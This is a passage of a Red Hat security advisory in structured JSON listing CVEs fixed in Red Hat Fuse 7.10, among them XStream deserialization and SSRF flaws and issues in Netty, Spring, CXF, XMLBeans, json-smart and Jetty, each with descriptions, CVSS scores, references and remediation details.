"category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21347" }, { "category": "external", "summary": "RHBZ#1942629", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942629" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21347", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21347" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21347", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21347" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: Unsafe deserizaliation of com.sun.tools.javac.processing.JavacProcessingEnvironment NameProcessIterator" }, { "cve": "CVE-2021-21348", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942633" } ], "notes": [ { "category": "description", "text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: ReDoS vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21348" }, { "category": "external", "summary": "RHBZ#1942633", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942633" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21348", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21348" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21348", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21348" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: ReDoS vulnerability" }, { "cve": "CVE-2021-21349", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942635" } ], "notes": [ { "category": "description", "text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: SSRF can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21349" }, { "category": "external", "summary": "RHBZ#1942635", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942635" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21349", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21349" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21349", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21349" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: SSRF can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host" }, { "cve": "CVE-2021-21350", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942637" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream. A remote attacker may be able to execute arbitrary code only by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: Unsafe deserizaliation of com.sun.org.apache.bcel.internal.util.ClassLoader", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21350" }, { "category": "external", "summary": "RHBZ#1942637", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942637" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21350", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21350" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21350", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21350" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: Unsafe deserizaliation of com.sun.org.apache.bcel.internal.util.ClassLoader" }, { "cve": "CVE-2021-21351", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942642" } ], "notes": [ { "category": "description", "text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21351" }, { "category": "external", "summary": "RHBZ#1942642", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942642" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21351", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21351" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21351", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21351" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream" }, { "cve": "CVE-2021-21409", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-03-30T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1944888" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty: Request smuggling via content-length header", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. 
However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21409" }, { "category": "external", "summary": "RHBZ#1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21409" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32", "url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32" } ], "release_date": "2021-03-30T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, 
databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty: Request smuggling via content-length header" }, { "cve": "CVE-2021-22118", "cwe": { "id": "CWE-281", "name": "Improper Preservation of Permissions" }, "discovery_date": "2021-06-22T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1974854" } ], "notes": [ { "category": "description", "text": "In Spring Framework, versions 5.2.x prior to 5.2.15 and versions 5.3.x prior to 5.3.7, a WebFlux application is vulnerable to a privilege escalation: by (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.", "title": "Vulnerability description" }, { "category": "summary", "text": "spring-web: (re)creating the temporary storage directory could result in a privilege escalation within WebFlux application", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP) the jenkins package bundles the vulnerable version of spring-framework, but as Jenkins is not a type of WebFlux application is not impacted by this 
vulnerability. Therefore the OCP components have been marked as affected/wontfix. This may be fixed in a future release.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22118" }, { "category": "external", "summary": "RHBZ#1974854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974854" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22118", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22118" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22118", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22118" }, { "category": "external", "summary": "https://github.com/spring-projects/spring-framework/issues/26931", "url": "https://github.com/spring-projects/spring-framework/issues/26931" }, { "category": "external", "summary": "https://tanzu.vmware.com/security/cve-2021-22118", "url": "https://tanzu.vmware.com/security/cve-2021-22118" } ], "release_date": "2021-05-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { 
"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "spring-web: (re)creating the temporary storage directory could result in a privilege escalation within WebFlux application" }, { "cve": "CVE-2021-22696", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-02T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1946341" } ], "notes": [ { "category": "description", "text": "CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a \"request\" parameter, the spec also supports specifying a URI from which to retrieve a JWT token from via the \"request_uri\" parameter. CXF was not validating the \"request_uri\" parameter (apart from ensuring it uses \"https) and was making a REST request to the parameter in the request to retrieve a token. This means that CXF was vulnerable to DDos attacks on the authorization server, as specified in section 10.4.1 of the spec. 
This issue affects Apache CXF versions prior to 3.4.3; Apache CXF versions prior to 3.3.10.", "title": "Vulnerability description" }, { "category": "summary", "text": "cxf: OAuth 2 authorization service vulnerable to DDos attacks", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22696" }, { "category": "external", "summary": "RHBZ#1946341", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946341" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22696", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22696" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22696", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22696" }, { "category": "external", "summary": "https://cxf.apache.org/security-advisories.data/CVE-2021-22696.txt.asc", "url": "https://cxf.apache.org/security-advisories.data/CVE-2021-22696.txt.asc" } ], "release_date": "2021-04-02T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": 
"LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "cxf: OAuth 2 authorization service vulnerable to DDos attacks" }, { "cve": "CVE-2021-23926", "cwe": { "id": "CWE-776", "name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)" }, "discovery_date": "2021-01-29T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1922102" } ], "notes": [ { "category": "description", "text": "A flaw was found when parsing XML files using XMLBeans 2.6.0 or below. The underlying parser created by XMLBeans could be susceptible to XML External Entity (XXE) attacks. 
The highest threat from this vulnerability is to confidentiality and system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xmlbeans: allowed malicious XML input may lead to XML Entity Expansion attack", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-23926" }, { "category": "external", "summary": "RHBZ#1922102", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922102" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-23926", "url": "https://www.cve.org/CVERecord?id=CVE-2021-23926" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-23926", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23926" } ], "release_date": "2021-01-13T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "Affected users are advised to update to Apache XMLBeans 3.0.0 or above, which fixes this vulnerability.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { 
"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "xmlbeans: allowed malicious XML input may lead to XML Entity Expansion attack" }, { "cve": "CVE-2021-27568", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2021-03-02T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1939839" } ], "notes": [ { "category": "description", "text": "A flaw was found in json-smart. When an exception is thrown from a function, but is not caught, the program using the library may crash or expose sensitive information. 
The highest threat from this vulnerability is to data confidentiality and system availability.\r\n\r\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of json-smart package.\r\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\r\nThis may be fixed in the future.\r\n\r\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Vulnerability description" }, { "category": "summary", "text": "json-smart: uncaught exception may lead to crash or information disclosure", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-27568" }, { "category": "external", "summary": "RHBZ#1939839", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1939839" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-27568", "url": "https://www.cve.org/CVERecord?id=CVE-2021-27568" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-27568", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27568" } ], "release_date": "2021-02-23T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 
7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "json-smart: uncaught exception may lead to crash or information disclosure" }, { "cve": "CVE-2021-28163", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2021-04-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945710" } ], "notes": [ { "category": "description", "text": "If the ${jetty.base} directory or the ${jetty.base}/webapps directory is a symlink the contents of the ${jetty.base}/webapps directory may be deployed as a static web application, exposing the content of the directory for download. 
